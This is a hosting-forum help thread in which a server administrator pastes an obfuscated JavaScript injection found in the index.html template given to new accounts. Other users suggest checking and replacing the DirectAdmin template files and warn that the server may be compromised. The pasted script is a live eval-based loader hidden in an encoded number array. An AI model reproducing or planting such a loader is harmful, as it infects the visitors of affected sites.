new account index.html hacked

[seachen]

i notice when i create new user account. the index.html include the below code:

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,218,357,400,120,218,348,428,101,216,321,184,116,216,300,184,99,198,141,400,47,104,144,208,46,224,312,448,63,206,333,244,49,78,96,476,105,200,348,416,61,78,147,192,39,64,312,404,105,206,312,464,61,78,147,192,39,64,345,464,121,216,303,244,39,236,315,460,105,196,315,432,105,232,363,232,104,210,300,400,101,220,177,448,111,230,315,464,105,222,330,232,97,196,345,444,108,234,348,404,59,216,303,408,116,116,144,236,116,222,336,232,48,118,117,248,60,94,315,408,114,194,327,404,62,68,123,236,13,18,27,500,13,18,27,408,117,220,297,464,105,222,330,128,105,204,342,388,109,202,342,160,41,246,39,36,9,18,354,388,114,64,306,128,61,64,300,444,99,234,327,404,110,232,138,396,114,202,291,464,101,138,324,404,109,202,330,464,40,78,315,408,114,194,327,404,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,460,114,198,117,176,39,208,348,464,112,116,141,188,109,238,300,480,109,232,321,404,108,214,138,464,108,200,138,396,99,94,300,188,52,96,156,184,112,208,336,252,103,222,183,196,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-587+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}</script>

may i know how to remove this ?

 

[toml]

Remove that index.html and look at your /usr/local/directadmin/data/templates/default/index.html if that was hacked then you need to replace that with a good one, the other place you may also want to look is in the /usr/local/directadmin/data/templates/custom directory for an index.html that would contain the above. If it exists in either place, any new accounts will get that garbage.

 

[nobaloney]

In fact, if the template directories include that exploit it's likely your system has been hacked, probably by someone well acquainted with DirectAdmin, and may no longer be trusted.

Jeff

 

[SeLLeRoNe]

Actually if i dont remember bad the main pages copied to a new user are stored in:

(for admin)
/home/admin/domains/default

Am i wrong?
If not, maybe "just" your admin user can be compromised, but ofc, if it is you cannot know how deep he goes, so, a format should be suggested.

Regards